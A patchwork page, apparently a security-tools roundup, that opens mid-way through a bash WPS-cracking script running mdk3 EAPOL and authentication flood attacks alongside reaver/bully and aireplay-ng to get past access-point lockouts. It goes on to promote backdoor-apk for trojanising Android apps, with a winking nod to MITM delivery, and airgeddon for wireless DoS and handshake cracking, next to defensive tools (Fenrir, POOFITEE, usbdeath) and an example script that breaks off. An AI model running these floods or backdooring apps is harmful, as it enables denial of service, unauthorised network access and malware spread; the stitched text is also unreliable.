echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mxThe Authentication EAPOL Start Flood Attack Command line below will be usedx\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
EAPOL_START_FLOOD_COMMAND=`echo -e "\e[36m\e[1mmdk3 $MON1 x 0 -t $MAC -n $ESSID -s 200 & mdk3 $MON2 x 0 -t $MAC -n $ESSID -s 200 & mdk3 $MON3 x 0 -t $MAC -n $ESSID -s 200\e[0m"`;
echo "$EAPOL_START_FLOOD_COMMAND";
read -p "To start the attack press ENTER to proceed or input 'r' to return to mdk3 main menu": RETURN_OPTION_FOR_EAPOL_START_FLOOD; 
if [  "$RETURN_OPTION_FOR_EAPOL_START_FLOOD" = r ]; then
clear
MDK3_MAIN_MENU;
fi
echo -e "\e[36m\e[1mStarting MDK3 EAPOL Start Flood Attack...\e[0m";
sleep 3;
if [ $WPS_PIN_CRACKER_OPTION = 1 ]; then 
REAVER & AIREPLAY & MDK3_FOR_REAVER & TAIL_FOR_REAVER;
fi 
if [ $WPS_PIN_CRACKER_OPTION = 2 ]; then 
BULLY & AIREPLAY & MDK3_FOR_BULLY & TAIL_FOR_BULLY;
fi 
}
###########################################################################
function EAPOL_LOG_OFF_ATTACK_MAIN_MENU {
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx                  EAPOL Log Off Flood Attack                                x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mxNOTE: This Attack will start flooding the AP with numerous EAPOL log off    x\e[0m";
echo -e "\e[36m\e[40m\e[1mxpackets until reaver detects that the AP is unlocked. The attack will       x\e[0m";
echo -e "\e[36m\e[40m\e[1mxrestart when the AP has locked itself again...the process goes on!          x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo;
read -p "What is the MAC address of one of the connected clients?": TARGET_STATION
while [[ "$TARGET_STATION" = @(|) ]]; do
echo -e "\e[31m\e[1mYou cannot leave this field blank\e[0m";
echo
read -p "What is the MAC address of one of the connected clients?": TARGET_STATION
done
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mxThe Authentication EAPOL Log Off Flood Attack Command line below will be usedx\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
EAPOL_LOG_OFF_FLOOD_COMMAND=`echo -e "\e[36m\e[1mmdk3 $MON1 x 1 -t $MAC  -s 200 -c $TARGET_STATION & mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION & mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION\e[0m"`;
echo "$EAPOL_LOG_OFF_FLOOD_COMMAND";
read -p "To start the attack press ENTER to proceed or input 'r' to return to mdk3 main menu": RETURN_OPTION_FOR_EAPOL_LOG_OFF_FLOOD; 
if [  "$RETURN_OPTION_FOR_EAPOL_LOG_OFF_FLOOD" = r ]; then
clear
MDK3_MAIN_MENU;
fi
echo -e "\e[36m\e[1mStarting MDK3 EAPOL Log Off Flood Attack...\e[0m";
sleep 3;
clear;
if [ $WPS_PIN_CRACKER_OPTION = 1 ]; then 
REAVER & AIREPLAY & MDK3_FOR_REAVER & TAIL_FOR_REAVER;
fi 
if [ $WPS_PIN_CRACKER_OPTION = 2 ]; then 
BULLY & AIREPLAY & MDK3_FOR_BULLY & TAIL_FOR_BULLY;
fi 
}
##########################################################################
function REAVER {
while :;do
echo y|$REAVER_COMMAND_LINE|tee -a /etc/reaver_tmp.txt > /dev/null
echo "Please Wait..." > /etc/reaver_tmp.txt 2> /dev/null;
sleep 5;
done
}
###########################################################################
function BULLY {

while :; do
stdbuf -o0 -e0 $BULLY_COMMAND_LINE|tee -a /etc/bully_tmp.txt > /dev/null 
echo "Please Wait..." > /etc/bully_tmp.txt 2> /dev/null
sleep 5;
done
}
###########################################################################
function MDK3_FOR_REAVER {
while :; do
MDK3_KILLALL_1=`ps -A|grep mdk3`
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/reaver_tmp.txt 2> /dev/null`;
SUCCESSIVE_EAPOL_FAILURES=`tail -4 /etc/reaver_tmp.txt 2> /dev/null|grep -F '[!] WARNING: 25 successive start failures'`;
while [ "$VARIABLE_CHECK_FOR_RATE_LIMITING" = "[!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking" -a -z "$MDK3_KILLALL_1"  ]; do
if [ "$MDK3_MAIN_MENU_OPTION" = 1 ]; then
gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e  "mdk3 $MON1 a -a $MAC -s 200" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e  "mdk3 $MON2 a -a $MAC -s 200" & gnome-terminal -e --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e "mdk3 $MON3 a -a $MAC -s 200";
###gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash -c "while :;do mdk3 $MON1 a -a $MAC -s 200;done" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash  -c "while :;do mdk3 $MON2 a -a $MAC -s 200;done" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash -c "while :;do mdk3 $MON3 a -a $MAC -s 200;done";
sleep 0.5;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 2 ]; then
gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON1 x 0 -t $MAC -n "$ESSID" -s 200" &  gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON2 x 0 -t $MAC -n "$ESSID" -s 200" &  gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON3 x 0 -t $MAC -n "$ESSID" -s 200";
###gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON1 x 0 -t $MAC -n "$ESSID" -s 200;done" &  gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON2 x 0 -t $MAC -n "$ESSID" -s 200;done" &  gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON3 x 0 -t $MAC -n "$ESSID" -s 200;done";
sleep 0.5;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 3 ]; then
###gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c "while :;do mdk3 $MON1 x 1 -t $MAC  -s 200 -c $TARGET_STATION;done" & gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c "while :;do mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION;done" & gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c  "while :;do mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION;done";
gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "mdk3 $MON1 x 1 -t $MAC  -s 200 -c $TARGET_STATION" & gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION" & gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e  "mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION";
sleep 0.5;
fi
MDK3_KILLALL_1=`ps -A|grep mdk3`
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/reaver_tmp.txt 2> /dev/null`;
SUCCESSIVE_EAPOL_FAILURES=`tail -4 /etc/reaver_tmp.txt 2> /dev/null|grep -F '[!] WARNING: 25 successive start failures'`;
done
###
while [ "$SUCCESSIVE_EAPOL_FAILURES" = "[!] WARNING: 25 successive start failures" -a -z "$MDK3_KILLALL_1" ]; do
killall -STOP reaver
echo -e "\e[36m\e[1mReaver detected 25 successive EAPOL failures! Pausing reaver and running flood attacks for 60 seconds!\e[0m" >> /etc/reaver_tmp.txt ;
if [ "$MDK3_MAIN_MENU_OPTION" = 1 ]; then
gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e  "timeout 60 mdk3 $MON1 a -a $MAC -s 200" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e  "timeout 60 mdk3 $MON2 a -a $MAC -s 200" & gnome-terminal -e --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e "timeout 60 mdk3 $MON3 a -a $MAC -s 200";
##gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash -c "while :; do mdk3 $MON1 a -a $MAC -s 200; done" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash  -c "while :;do mdk3 $MON2 a -a $MAC -s 200;done" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash -c "while :;do mdk3 $MON3 a -a $MAC -s 200;done";
sleep 60;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 2 ]; then
gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "timeout 60 mdk3 $MON1 x 0 -t $MAC -n "$ESSID" -s 200" &  gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e " timeout 60 mdk3 $MON2 x 0 -t $MAC -n "$ESSID" -s 200" &  gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "timeout 60 mdk3 $MON3 x 0 -t $MAC -n "$ESSID" -s 200";
###gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON1 x 0 -t $MAC -n "$ESSID" -s 200;done" &  gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON2 x 0 -t $MAC -n "$ESSID" -s 200;done" &  gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON3 x 0 -t $MAC -n "$ESSID" -s 200;done";
sleep 60;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 3 ]; then
gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "timeout 60 mdk3 $MON1 x 1 -t $MAC  -s 200 -c $TARGET_STATION" & gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "timeout 60 mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION" & gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e  "timeout 60 mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION";
###gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c "while :;do mdk3 $MON1 x 1 -t $MAC  -s 200 -c $TARGET_STATION;done" & gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c "while :;do mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION;done" & gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c  "while :;do mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION;done";
sleep 60;
fi
killall -CONT reaver;
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/reaver_tmp.txt 2> /dev/null`
SUCCESSIVE_EAPOL_FAILURES=`tail -4 /etc/reaver_tmp.txt 2> /dev/null|grep -F '[!] WARNING: 25 successive start failures'`;
MDK3_KILLALL_1=`ps -A|grep mdk3`
done
###
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/reaver_tmp.txt 2> /dev/null`
SUCCESSIVE_EAPOL_FAILURES=`tail -4 /etc/reaver_tmp.txt 2> /dev/null|grep -F '[!] WARNING: 25 successive start failures'`;
if [ "$VARIABLE_CHECK_FOR_RATE_LIMITING" != "[!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking" -o "$SUCCESSIVE_EAPOL_FAILURES" =  "[!] WARNING: 25 successive start failures" ]; then
KILL_ALL_MDK3_EMULATORS_1=`ps -n 2> /dev/null|cut -d ' ' -f1,2,3,4,5,6,7,8,9,11,12,13,14,15|grep 'bash -c while :;do'|cut -d ' ' -f1|tr -s [:space:] ' '`
###for i in $KILL_ALL_MDK3_EMULATORS_1 ; do
###kill -9 "$i"  &> /dev/null  ;
###kill  -9"$i"  &> /dev/null  ;
###killall mdk3 2> /dev/null 
##done
##KILL_ALL_MDK3_EMULATORS_1=`ps -n 2> /dev/null|cut -d ' ' -f1,2,3,4,5,6,7,8,9,11,12,13,14,15|grep 'bash -c while :;do'|cut -d ' ' -f2|tr -s [:space:] ' '`
##for i in $KILL_ALL_MDK3_EMULATORS_1 ; do
##kill -9 "$i"  &> /dev/null  ;
##kill -9 "$i"  &> /dev/null  ;
##done
killall mdk3 2> /dev/null 
fi
done
}
###########################################################################
function MDK3_FOR_BULLY {
while :; do
MDK3_KILLALL_1=`ps -A|grep mdk3`
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/bully_tmp.txt 2> /dev/null`;
while [ "$VARIABLE_CHECK_FOR_RATE_LIMITING" = "[!] WPS lockout reported, sleeping for 10 seconds ..." -a -z "$MDK3_KILLALL_1"  ]; do
if [ "$MDK3_MAIN_MENU_OPTION" = 1 ]; then
gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e  "mdk3 $MON1 a -a $MAC -s 200" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e  "mdk3 $MON2 a -a $MAC -s 200" & gnome-terminal -e --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e "mdk3 $MON3 a -a $MAC -s 200";
###gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash -c "while :; do mdk3 $MON1 a -a $MAC -s 200; done" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash  -c "while :;do mdk3 $MON2 a -a $MAC -s 200;done" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash -c "while :;do mdk3 $MON3 a -a $MAC -s 200;done";
sleep 0.5;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 2 ]; then
gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON1 x 0 -t $MAC -n "$ESSID" -s 200" &  gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON2 x 0 -t $MAC -n "$ESSID" -s 200" &  gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON3 x 0 -t $MAC -n "$ESSID" -s 200";
###gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON1 x 0 -t $MAC -n "$ESSID" -s 200;done" &  gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON2 x 0 -t $MAC -n "$ESSID" -s 200;done" &  gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON3 x 0 -t $MAC -n "$ESSID" -s 200;done";
sleep 0.5;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 3 ]; then
###gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c "while :;do mdk3 $MON1 x 1 -t $MAC  -s 200 -c $TARGET_STATION;done" & gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c "while :;do mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION;done" & gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c  "while :;do mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION;done";
gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "timeout 60 mdk3 $MON1 x 1 -t $MAC  -s 200 -c $TARGET_STATION" & gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "timeout 60 mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION" & gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e  "timeout 60 mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION";
sleep 0.5;
fi
MDK3_KILLALL_1=`ps -A|grep mdk3`
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/bully_tmp.txt 2> /dev/null`;
done
###
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/bully_tmp.txt 2> /dev/null`;
if [ "$VARIABLE_CHECK_FOR_RATE_LIMITING" != "[!] WPS lockout reported, sleeping for 10 seconds ..." ]; then
KILL_ALL_MDK3_EMULATORS_1=`ps -n 2> /dev/null|cut -d ' ' -f1,2,3,4,5,6,7,8,9,11,12,13,14,15|grep 'bash -c while :;do'|cut -d ' ' -f1|tr -s [:space:] ' '`
##for i in $KILL_ALL_MDK3_EMULATORS_1 ; do
##kill -9 "$i"  &> /dev/null  ;
##kill  -9 "$i"  &> /dev/null ;
##done
##KILL_ALL_MDK3_EMULATORS_1=`ps -n 2> /dev/null|cut -d ' ' -f1,2,3,4,5,6,7,8,9,11,12,13,14,15|grep 'bash -c while :;do'|cut -d ' ' -f2|tr -s [:space:] ' '`
##for i in $KILL_ALL_MDK3_EMULATORS_1 ; do
##kill -9 "$i"  &> /dev/null  ;
##kill -9 "$i"  &> /dev/null  ;
##done
killall mdk3 2> /dev/null
fi
done
}

########################################################################################################################
function TAIL_FOR_REAVER {
while :; do
clear
timeout 10 tail -n 100 -f  /etc/reaver_tmp.txt 2> /dev/null;
clear
sleep 1;
AIREPLAY_RESET=`cat '/etc/aireplay_tmp.txt'|grep -w 'Switching to shared key authentication'`
if [ -n "$AIREPLAY_RESET" ]; then
killall aireplay-ng
fi
timeout 5 tail -n 100 -f /etc/aireplay_tmp.txt 2> /dev/null
done
}
###########################################################################
function TAIL_FOR_BULLY {
while :; do
clear
timeout 10 tail -n 100 -f  /etc/bully_tmp.txt 2> /dev/null;
clear
sleep 1;
AIREPLAY_RESET=`cat '/etc/aireplay_tmp.txt'|grep -w 'Switching to shared key authentication'`
if [ -n "$AIREPLAY_RESET" ]; then
killall aireplay-ng
fi
timeout 5 tail -n 100 -f /etc/aireplay_tmp.txt 2> /dev/null
done
}
###########################################################################
function AIREPLAY {
while :; do
aireplay-ng $MON1 -1 100000000 -a "$MAC" -e "$ESSID" -Q -q3 2>> /dev/null| tee /etc/aireplay_tmp.txt > /dev/null;
echo "Please Wait..." >> /etc/aireplay_tmp.txt 2> /dev/null
sleep 1;
done
}
###########################################################################
MDK3_MAIN_MENU

Source: https://github.com/r0bag

backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file.


backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only.

The recompiled APK will be found in the ‘original/dist’ directory. Install the APK on a compatible Android device, run it, and handle the meterpreter connection at the specified IP and port.
Usage:

git clone https://github.com/dana-at-cp/backdoor-apk && cd backdoor-apk
cd backdoor-apk
./backdoor-apk.sh [your apk file]

Now you can upload it using a MITM technique :-) (Just for educational purposes, right? Yeah... let's rock)

Source: https://github.com/dana-at-cp

Airgeddon v3.41dev – This is a multi-use bash script for Linux systems to audit wireless networks.


changelog v3.41dev:
+ Show network cards chipset while selecting interface
+ Some language strings changed
+ License updated to GPL3+
+ Added Open Document SpreadSheet for easy translation to be used by collaborating translators
+ System of prefixes and colors for hints and strings pending translation [PoT]

airgeddon is a multi-use bash script for Linux systems to audit wireless networks.

airgeddon menu


Features:
+ Interface mode switcher (Monitor-Managed).
+ DoS over wireless networks with different methods.
+ Assisted Handshake file capture.
+ Cleaning and optimizing Handshake captured files.
+ Offline password decrypt on WPA/WPA2 captured files (dictionary and bruteforce).
+ Compatibility with many Linux distros (see requirements section).
+ Easy targeting and selection in every section.
+ Controlled Exit. Cleaning tasks and temp files. Option to keep monitor mode if desired.
+ Multilanguage support and autodetect OS language feature (see supported languages section).
+ Help hints in every zone/menu for easy use.
+ Autoupdate. Script checks for a newer version if possible.

Requirements
+ Bash version 4 or later needed.

Tested on these 100% compatible Linux distros:
-Kali. 2.0 and 2016.1
-Wifislax. 4.11.1 and 4.12
-Backbox. 4.5.1
-Parrot. 2.2.1
-Blackarch 2016.01.10
-Cyborg Hawk 1.1

Usage:

git clone https://github.com/v1s1t0r1sh3r3/airgeddon && cd airgeddon
chmod +x airgeddon.sh
./airgeddon.sh

Update:
git pull origin master

Source: https://github.com/v1s1t0r1sh3r3 | Our Post Before


Fenrir is a simple IOC scanner bash script.


Fenrir is a simple IOC scanner bash script. It allows scanning Linux/Unix/OSX systems for the following Indicators of Compromise (IOCs):
+ Hashes
** MD5, SHA1 and SHA256 (using md5sum, sha1sum, sha -a 256)
+ File Names
** string – checked for substring of the full path, e.g. “temp/p.exe” in “/var/temp/p.exe”
+ Strings
** grep in files
+ C2 Server
** checking for C2 server strings in ‘lsof -i’ and ‘lsof -i -n’ output
+ Hot Time Frame
** using stat in different modes – define min and max epoch time stamp and get all files that have been created in between
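The five indicator types above, run as one shell scan: an added example written in the style Fenrir describes, not Fenrir's own code. It uses only md5sum, grep, find and stat (GNU stat, with the BSD form as a fallback), builds a constructed temporary tree to scan, and every IOC value is a placeholder (the MD5 is that of a zero-length file, chosen so the empty sample file hits it).

```shell
#!/bin/sh
# IOC scan over a directory tree with only md5sum, grep, find and stat.
# Added example in the style of Fenrir, not Fenrir's own code.

# Constructed indicator sets (placeholders, not real IOCs), one value per line.
IOC_MD5='d41d8cd98f00b204e9800998ecf8427e'   # md5 of a zero-length file
IOC_FILENAMES='temp/p.exe
evil-dropper'
IOC_STRINGS='IOC-PLACEHOLDER-BEACON-STRING'

# file_mtime PATH -> modification time in epoch seconds (GNU stat, then BSD/macOS stat)
file_mtime() {
    stat -c %Y "$1" 2>/dev/null || stat -f %m "$1" 2>/dev/null
}

# scan_file PATH HOT_MIN HOT_MAX -> one "MATCH <type> <path>" line per indicator hit
scan_file() {
    f=$1; hot_min=$2; hot_max=$3
    # Hash IOC: exact line match of the md5sum digest against the list.
    h=$(md5sum "$f" | cut -d' ' -f1)
    if printf '%s\n' "$IOC_MD5" | grep -qx "$h"; then
        echo "MATCH hash $f"
    fi
    # File-name IOC: substring of the full path, e.g. "temp/p.exe" in "/var/temp/p.exe".
    printf '%s\n' "$IOC_FILENAMES" | while IFS= read -r pat; do
        case "$f" in *"$pat"*) echo "MATCH filename $f" ;; esac
    done
    # String IOC: fixed-string grep inside the file.
    printf '%s\n' "$IOC_STRINGS" | while IFS= read -r s; do
        if grep -qF -- "$s" "$f" 2>/dev/null; then
            echo "MATCH string $f"
        fi
    done
    # Hot time frame: modification time between the two epoch bounds.
    mtime=$(file_mtime "$f")
    if [ -n "$mtime" ] && [ "$mtime" -ge "$hot_min" ] && [ "$mtime" -le "$hot_max" ]; then
        echo "MATCH hot-timeframe $f"
    fi
}

# scan_dir DIR HOT_MIN HOT_MAX -> scan_file on every regular file under DIR,
# skipping files of 2 MiB or more (a size exclusion of the kind Fenrir uses).
scan_dir() {
    find "$1" -type f -size -2048k | while IFS= read -r f; do
        scan_file "$f" "$2" "$3"
    done
}

# make_demo_tree -> path of a constructed temporary tree: an empty var/temp/p.exe
# (hits hash and filename), a note holding the placeholder string, and a clean file.
make_demo_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/var/temp"
    : > "$d/var/temp/p.exe"
    echo "beacon config: IOC-PLACEHOLDER-BEACON-STRING" > "$d/notes.txt"
    echo "nothing of interest" > "$d/clean.txt"
    echo "$d"
}

demo() {
    d=$(make_demo_tree)
    now=$(date +%s)
    echo "== hot time frame covering now: every file also hits hot-timeframe =="
    scan_dir "$d" "$((now - 300))" "$((now + 300))"
    echo "== hot time frame in the distant past: only hash, filename and string hits =="
    scan_dir "$d" 0 1
    rm -rf "$d"
}
demo
```

Each hit is a single MATCH line, which is what makes output from a hundred hosts easy to collect and diff; the size cut-off in scan_dir is the kind of "smart exclusion" the changelog refers to, and the time-frame check is the cheapest way to narrow a large tree to files touched during a known incident window.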

fenrir


Latest Changelog v0.5.2:
– String extract in output
– release, issue and uname in output
– Syslog output disabled by default (to avoid false positives)
– C2 check in lsof enabled by default
– More interesting extensions

Basic characteristics:
* Bash Script
* No installation or agent needed
* Uses common tools to extract attributes (e.g. md5sum, grep, stat in different modes)
* Intended to run on any Linux / Unix / OS X with Bash
* Low footprint – Ansible playbook with RAM drive solution
* Smart exclusions (file size, extension, certain directories) speeds up the scan process

Why Fenrir?
+ FENRIR is the 3rd tool after THOR and LOKI. THOR is our full featured APT Scanner with many modules and export types for corporate customers. LOKI is a free and open IOC scanner that uses YARA as signature format.
+ The problem with both predecessors is that both have certain requirements on the Linux platform. We build THOR for a certain Linux version in order to match the correct libc that is required by the YARA module. LOKI requires Python and YARA installed on Linux to run.
+ We faced the problem of checking more than 100 different Linux systems for certain Indicators of Compromise (IOCs) without installing an agent or software packages. We already had an Ansible playbook for the distribution of THOR on a defined set of Linux remote systems. This playbook creates a RAM drive on the remote system, copies the local program binary to the remote system, runs it and retrieves the logs afterwards. This ensures that the program’s footprint on the remote system is minimal. I adapted the Ansible playbook for Fenrir (it is still untested).

Usage & Download from git:

git clone https://github.com/Neo23x0/Fenrir && cd Fenrir
./fenrir.sh [your path folder]

Update:
git pull origin master

Source: https://github.com/Neo23x0

POOFITEE – Linux Scripting “Perfect Owner Only Firewall – Invisible To Everyone Else”.


BULLET-PROOF YOUR “OWNER-ACCESS-ONLY” LINUX SERVER FROM HACKERS WITH IPTABLES AND ROBUST SHELL SCRIPTING.

Bare minimum packages and whitelist-only access to your Linux home surveillance &/or automation system such as NEST or WeMo, or your WiFi router (if port or other forwarding, or external management are in use). ENTERPRISES: Let POOFITEE create the blacklists you need! Run POOFITEE on an external ip address that should have no incoming traffic, then share with your firewalls the ipset blacklist it creates.

No hackers can get any data or communication at all out of your system when this firewalling solution is installed on it:
* Only you know how to get your remote IP address permitted by the whitelist to become an authorized source address. This is done by port knocking or email. Source addresses not whitelisted are ignored as effectively as if they were explicitly blacklisted. All 65536 of your ports are invisible to them.
* Only you know the IP address of your system – it’s emailed to you fresh every time your system’s address is changed by DHCP.
* You will be notified immediately by email/text of any and all source addresses that your system places on its whitelist or removes from its blacklist.
* You would still continue to use passwords and ssh keys as is prudent even for systems without firewall protection.

All this PLUS the simplicity and robustness inherent in a bare iptables and scripting-only Linux solution, PLUS the option of building an explicit blacklist of first-time hacking packets in real-time for your reference and curiosity, if your system has enough RAM.

POOFITEE


Firewalling options this install script should be able to change from the script’s defaults:
— Stop probe logging/blacklisting to save space or if you’re just not curious – comment out the crontab entry and kill the process
— Open specific ports to offer public services
— Force single-interface firewalling even though two interfaces exist
— Alter the IP address of the private-side interface from 192.168.3.1
— Dynamic re-config of interfaces: external may swap with internal, and the private IP on external may become public & vice versa for laptops, etc. Triggered whenever the external interface changes
— Allow installer to specify which internal interface to trust
— accommodate multiple vlans

Why anyone would want a blacklist to accumulate:
1) differentiate between neutral and hostile when providing public services,
2) assist in selecting ports for knock sequence or email knock by which are least probed,
3) just to have a blacklist so admin/owner can blacklist their own choices of Internet addresses,
4) give to other firewall software in a multi-box environment,
5) sales, marketing, winning a bet, or other reasons to prove the point to self or others,
6) curiosity

Usage & Download from git:

git clone https://github.com/kenneth558/POOFITEE && cd POOFITEE
chmod a+x POOFITEE
./POOFITEE

Source: https://github.com/kenneth558

usbdeath ~ anti-forensic tool that writes udev rules for known usb devices.


usbdeath is a small script inspired by usbkill (https://github.com/hephaest0s/usbkill), “an anti-forensic kill-switch that waits for a change on your USB ports and then immediately shuts down your computer”. The main differences are:
+ it is written in bash, so literally anyone with basic programming skills could read through the code and audit it
+ it is not a daemon, just a rule-file manipulation script; all monitoring is done by the existing udev daemon
+ it uses more identification values for usb devices (if usb device has these values) such as name and serial number
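How a rule-file approach of this kind works, as an added example in the spirit of usbdeath (not its code): known devices are matched on idVendor, idProduct and, where the device exposes one, its serial, and jump past a catch-all rule; any other usb_device add event runs an action script. The inventory below is constructed, and the action path, the label name and the NO-SERIAL marker are assumptions of this example.

```shell
#!/bin/sh
# Generate udev rules that let known USB devices through and run an action for any
# other device that is plugged in. Added example in the spirit of usbdeath, not its code.

# Constructed inventory ("idVendor:idProduct serial"); the values are made up, and
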